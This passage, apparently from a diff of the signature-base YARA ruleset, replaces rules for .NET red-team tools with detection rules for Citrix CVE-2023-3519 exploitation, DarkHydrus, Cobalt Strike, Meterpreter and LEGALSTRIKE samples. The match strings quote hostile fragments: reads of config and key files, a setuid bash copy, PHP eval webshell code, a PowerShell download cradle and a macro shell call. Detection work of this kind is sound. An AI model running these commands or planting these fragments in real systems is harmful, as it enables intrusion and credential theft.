+		$s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Neo_Confuserex : FILE
+rule SIGNATURE_BASE_EXPL_Citrix_Netscaler_ADC_Forensicartifacts_CVE_2023_3519_Jul23_2 : CVE_2023_3519 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d73117a6-4512-5545-a4f4-72d8cf708340"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/XenocodeRCE/neo-ConfuserEx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4018-L4031"
+		description = "Detects forensic artifacts found after an exploitation of Citrix NetScaler ADC CVE-2023-3519"
+		author = "Florian Roth"
+		id = "471ce547-0133-5836-b9d1-02c932ecfd1e"
+		date = "2023-07-21"
+		modified = "2023-12-05"
+		reference = "https://www.cisa.gov/sites/default/files/2023-07/aa23-201a_csa_threat_actors_exploiting_citrix-cve-2023-3519_to_implant_webshells.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L27-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c916b5443d5df0d58020aec6f3576e3d9cec50fa00b764d86ec7f3a49d0a8d93"
-		score = 75
+		logic_hash = "48d4225d0935084003f7a98c554d7c4722a91290dfe190001da52bce332b3f7d"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-3519, FILE"
 
 	strings:
-		$typelibguid0lo = "e98490bb-63e5-492d-b14e-304de928f81a" ascii wide
+		$s1 = "tar -czvf - /var/tmp/all.txt" ascii fullword
+		$s2 = "-out /var/tmp/test.tar.gz" ascii
+		$s3 = "/test.tar.gz /netscaler/"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10MB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpallowedtoact : FILE
+rule SIGNATURE_BASE_EXPL_Citrix_Netscaler_ADC_Forensicartifacts_CVE_2023_3519_Jul23_3 : CVE_2023_3519 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "13b7f5e0-4d34-533d-a182-b3fe7c93ca43"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/pkb1s/SharpAllowedToAct"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4033-L4046"
+		description = "Detects forensic artifacts found after an exploitation of Citrix NetScaler ADC CVE-2023-3519"
+		author = "Florian Roth"
+		id = "2f40b423-f1da-5711-ac4f-18de77cd52d0"
+		date = "2023-07-24"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L43-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "688c1e5944a96b3cc40deb3c3949da0391e9dbde8c78bcc05a1f48817ae7a0d4"
-		score = 75
+		logic_hash = "e78e1a788503b841ed0f4e5cd415eb35d8911092778120d7fd061ed20820da37"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-3519, FILE"
 
 	strings:
-		$typelibguid0lo = "dac5448a-4ad1-490a-846a-18e4e3e0cf9a" ascii wide
+		$x1 = "cat /flash/nsconfig/ns.conf >>" ascii
+		$x2 = "cat /nsconfig/.F1.key >>" ascii
+		$x3 = "openssl base64 -d < /tmp/" ascii
+		$x4 = "cp /usr/bin/bash /var/tmp/bash" ascii
+		$x5 = "chmod 4775 /var/tmp/bash"
+		$x6 = "pwd;pwd;pwd;pwd;pwd;"
+		$x7 = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10MB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Supersqlinjectionv1 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Citrix_Netscaler_ADC_Exploitation_Attempt_CVE_2023_3519_Jul23_1 : CVE_2023_3519
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "247bef0d-7873-51c7-97b8-1be6dfe7708d"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/shack2/SuperSQLInjectionV1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4048-L4061"
+		description = "This YARA rule detects forensic artifacts that appear following an attempted exploitation of Citrix NetScaler ADC CVE-2023-3519. The rule identifies an attempt to access the vulnerable function using an overly long URL, a potential sign of attempted exploitation. However, it does not confirm whether such an attempt was successful."
+		author = "Florian Roth"
+		id = "7dfe4130-d976-5d6d-a05d-ccadefe45406"
+		date = "2023-07-27"
+		modified = "2023-12-05"
+		reference = "https://blog.assetnote.io/2023/07/24/citrix-rce-part-2-cve-2023-3519/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L63-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cc4d7ac59d1092c357e0c1ac23eab1618a712cf846a65097c283ef62cfcb0c7d"
-		score = 75
+		logic_hash = "7ad3164c5b2616b12a513a2bb3736d530769e75fca03346a72351a27b8343b2a"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-3519"
 
 	strings:
-		$typelibguid0lo = "d5688068-fc89-467d-913f-037a785caca7" ascii wide
+		$sr1 = /GWTEST FORMS SSO: Parse=0; URLLEN=([2-9][0-9]{2}|[0-9]{4,20}); Event: start=0x/
+		$s1 = ", type=1; Target: start=0x"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Adsearch : FILE
+rule SIGNATURE_BASE_WEBSHELL_SECRETSAUCE_Jul23_1 : CVE_2023_3519 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "399ea06d-b36a-542b-bccc-8e8f935a35c6"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/tomcarver16/ADSearch"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4063-L4076"
+		description = "Detects SECRETSAUCE PHP webshells (found after an exploitation of Citrix NetScaler ADC CVE-2023-3519)"
+		author = "Florian Roth"
+		id = "db0542e7-648e-5f60-9838-e07498f58b51"
+		date = "2023-07-24"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L79-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d925d212b9474078cb3e8694048de22e56de94b33839647c187f3254149bf4ff"
-		score = 75
+		logic_hash = "c762d46ae43a3e10453c2ee17039812a06086ac85bdb000cf8308f5196a9dee2"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-3519, FILE"
 
 	strings:
-		$typelibguid0lo = "4da5f1b7-8936-4413-91f7-57d6e072b4a7" ascii wide
+		$sa1 = "for ($x=0; $x<=1; $x++) {" ascii
+		$sa2 = "$_REQUEST[" ascii
+		$sa3 = "@eval" ascii
+		$sb1 = "public $cmd;" ascii
+		$sb2 = "return @eval($a);" ascii
+		$sb3 = "$z->run($z->get('openssl_public_decrypt'));"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and ( all of ( $sa* ) or 2 of ( $sb* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Privilege_Escalation_Awesome_Scripts_Suite : FILE
+
+rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fa218dfa-4b56-5a62-b149-63394bd0b604"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4078-L4091"
+		description = "Detects strings found in malware samples in APT report in DarkHydrus"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fbd001c0-43c9-5429-84d6-7f62eadd8ff3"
+		date = "2018-07-28"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkhydrus.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fdaa169213f31229973956cba064128ea6d256e339a8e3eb42cc9798ddf007f"
+		logic_hash = "2c39f2e6b37e6422984275f45a2917891c3b482d137dbbfd6293088c2f2dacc3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
 
 	strings:
-		$typelibguid0lo = "1928358e-a64b-493f-a741-ae8e3d029374" ascii wide
+		$x1 = "Z:\\devcenter\\aggressor\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "d3666d1cde4790b22b44ec35976687fb" or 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_1206_POC : FILE
+rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d70472f3-b19f-5097-bd70-99a7e7812ac4"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/ZecOps/CVE-2020-1206-POC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4093-L4108"
+		description = "Detects strings found in malware samples in APT report in DarkHydrus"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1a21cbbf-f7e1-56eb-973b-35c1a811e210"
+		date = "2018-07-28"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkhydrus.yar#L31-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26511510a1075457c8f133001fac18c8b44c997bd368b9336751bca714ec6ec3"
+		logic_hash = "e967fec69ad1cbb46a63ee520594e7d6f2445a400510a9864dbd6d4c6e092737"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81"
 
 	strings:
-		$typelibguid0lo = "3523ca04-a12d-4b40-8837-1a1d28ef96de" ascii wide
-		$typelibguid1lo = "d3a2f24a-ddc6-4548-9b3d-470e70dbcaab" ascii wide
-		$typelibguid2lo = "fb30ee05-4a35-45f7-9a0a-829aec7e47d9" ascii wide
+		$s4 = "windir" fullword ascii
+		$s6 = "temp.dll" fullword ascii
+		$s7 = "libgcj-12.dll" fullword ascii
+		$s8 = "%s\\System32\\%s" fullword ascii
+		$s9 = "StartW" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvoke : FILE
+
+rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_3 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f3b0ef47-a92c-5c5d-a9e2-09579fcb438e"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/TheWover/DInvoke"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4110-L4123"
+		description = "Detects strings found in malware samples in APT report in DarkHydrus"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1f766b49-3173-5f8a-ba52-a9ce9000be79"
+		date = "2018-07-28"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkhydrus.yar#L50-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4e7479d36ce78332d2224f16bc2f3059baa418f3035bca8b1ae1e5053dd4d3c3"
+		logic_hash = "0f3425322846e6064ec2576ad4e73061fbec3e4400de54d05fe07b8ad2a31f92"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3"
 
 	strings:
-		$typelibguid0lo = "b77fdab5-207c-4cdb-b1aa-348505c54229" ascii wide
+		$s2 = "Ws2_32.dll" fullword ascii
+		$s3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "478eacfbe2b201dabe63be53f34148a5" or all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpchisel : FILE
+
+rule SIGNATURE_BASE_HKTL_Unlicensed_Cobaltstrike_EICAR_Jul18_5 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3b7e6703-ebe8-5a98-839f-7d0349ab483f"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/shantanu561993/SharpChisel"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4125-L4138"
+		description = "Detects strings found in CobaltStrike shellcode"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d52536b8-dd6b-59be-8761-d22b6a279114"
+		date = "2018-07-28"
+		modified = "2021-06-17"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkhydrus.yar#L69-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b2efa0f3757bf93a677d1faea14a71d2e63f45de99b7c9e55a951e6c401f6bd8"
+		logic_hash = "d066f22e01f9ca3a33c669552046a5ab8dd9e579236974b1c468ba9644498951"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1"
 
 	strings:
-		$typelibguid0lo = "f5f21e2d-eb7e-4146-a7e1-371fd08d6762" ascii wide
+		$x1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
+		$s2 = "libgcj-12.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or all of ( $s* ) or $x1 )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpscribbles : FILE
+
+rule SIGNATURE_BASE_MAL_Devilstongue_Hijackdll : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "47125b76-9388-5372-8810-d198f623367a"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/V1V1/SharpScribbles"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4140-L4154"
+		description = "Detects SOURGUM's DevilsTongue hijack DLL"
+		author = "Microsoft Threat Intelligence Center (MSTIC)"
+		id = "390b8b73-6740-513d-8c70-c9002be0ce69"
+		date = "2021-07-15"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_candiru.yar#L3-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4cff3fb3540fa1e189c71584889d07111ccc4a340c78011213819f206631446"
-		score = 75
+		logic_hash = "4ad58a77f9ab5fa078dc40f3ec1d0b0180f25ff3ea304a3c85889df29739e0f5"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "aa61a166-31ef-429d-a971-ca654cd18c3b" ascii wide
-		$typelibguid1lo = "0dc1b824-c6e7-4881-8788-35aecb34d227" ascii wide
+		$str1 = "windows.old\\windows" wide
+		$str2 = "NtQueryInformationThread"
+		$str3 = "dbgHelp.dll" wide
+		$str4 = "StackWalk64"
+		$str5 = "ConvertSidToStringSidW"
+		$str6 = "S-1-5-18" wide
+		$str7 = "SMNew.dll"
+		$code1 = { B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8 }
+		$code2 = { 44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 800KB and uint16( 0 ) == 0x5A4D and ( pe.characteristics & pe.DLL ) and ( 4 of them or ( $code1 and $code2 ) or pe.imphash ( ) == "9a964e810949704ff7b4a393d9adda60" )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpreg : FILE
+rule SIGNATURE_BASE_Beacon_K5Om : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d89b07b0-bb29-5c77-888b-322e439b4c82"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/jnqpblc/SharpReg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4156-L4169"
+		description = "Detects Meterpreter Beacon - file K5om.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9354d20a-d798-55bf-a735-820f21d4a861"
+		date = "2017-06-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt19.yar#L10-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d483e590310d69df4a0267ae3091067deb8698526dd8069862a944a6b1faed05"
+		logic_hash = "4b1ec0fc6c0ad4e76c526f7568153bca62f9bffdd38a3b1eaa51a37a1dcab226"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9"
 
 	strings:
-		$typelibguid0lo = "8ef25b00-ed6a-4464-bdec-17281a4aa52f" ascii wide
+		$x1 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+		$x2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
+		$s1 = "Could not open process token: %d (%u)" fullword ascii
+		$s2 = "0fd00b.dll" fullword ascii
+		$s3 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+		$s4 = "Could not connect to pipe (%s): %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Memevm : FILE
+rule SIGNATURE_BASE_FE_LEGALSTRIKE_MACRO
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c98d84d5-4b0a-53df-b8d4-0b360930eb0c"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/TobitoFatitoRE/MemeVM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4171-L4186"
+		description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
+		author = "Ian.Ahl@fireeye.com @TekDefense - modified by Florian Roth"
+		id = "eb15e5aa-16e5-5c07-a293-ad15c0c09d8e"
+		date = "2017-06-02"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt19.yar#L34-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "88f4b9d0b3050ad676a54a58ea8f6a02fb07041db404c9d84f25fdda6ff3df4a"
+		logic_hash = "b38edeedcc02168d3ba7e82c3f5c6963ffc8ce1688eeb424ce686484f3687512"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		version = ".1"
+		filetype = "MACRO"
 
 	strings:
-		$typelibguid0lo = "ef18f7f2-1f03-481c-98f9-4a18a2f12c11" ascii wide
-		$typelibguid1lo = "77b2c83b-ca34-4738-9384-c52f0121647c" ascii wide
-		$typelibguid2lo = "14d5d12e-9a32-4516-904e-df3393626317" ascii wide
+		$ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
+		$wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
+		$wsobj2 = "Obj.Run " ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdir : FILE
+rule SIGNATURE_BASE_FE_LEGALSTRIKE_RTF : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f64ed564-d198-59e8-9abe-b2814b95c85f"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/jnqpblc/SharpDir"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4188-L4201"
+		description = "Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
+		author = "joshua.kim@FireEye. - modified by Florian Roth"
+		id = "b62ceffa-445f-517e-b86b-56e47876c6c0"
+		date = "2017-06-02"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt19.yar#L52-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a98ee516931d08d82fb28749130be7d8007a8ac2935fd6007bae27820e216a92"
+		logic_hash = "af811694076f7d53ee76713538839c4ec82c591518d59d5988dcb893bfd32ffe"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = ".1"
+		filetype = "MACRO"
 
 	strings:
-		$typelibguid0lo = "c7a07532-12a3-4f6a-a342-161bb060b789" ascii wide
+		$lnkinfo = "4c0069006e006b0049006e0066006f"
+		$encoded1 = "4f4c45324c696e6b"
+		$encoded2 = "52006f006f007400200045006e007400720079"
+		$encoded3 = "4f0062006a0049006e0066006f"
+		$encoded4 = "4f006c0065"
+		$datastore = "\\*\\datastore"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32be( 0 ) == 0x7B5C7274 and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Atyourservice : FILE
+
+rule SIGNATURE_BASE_Elise_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3077dd0c-6936-5340-8da9-e8643de4d864"
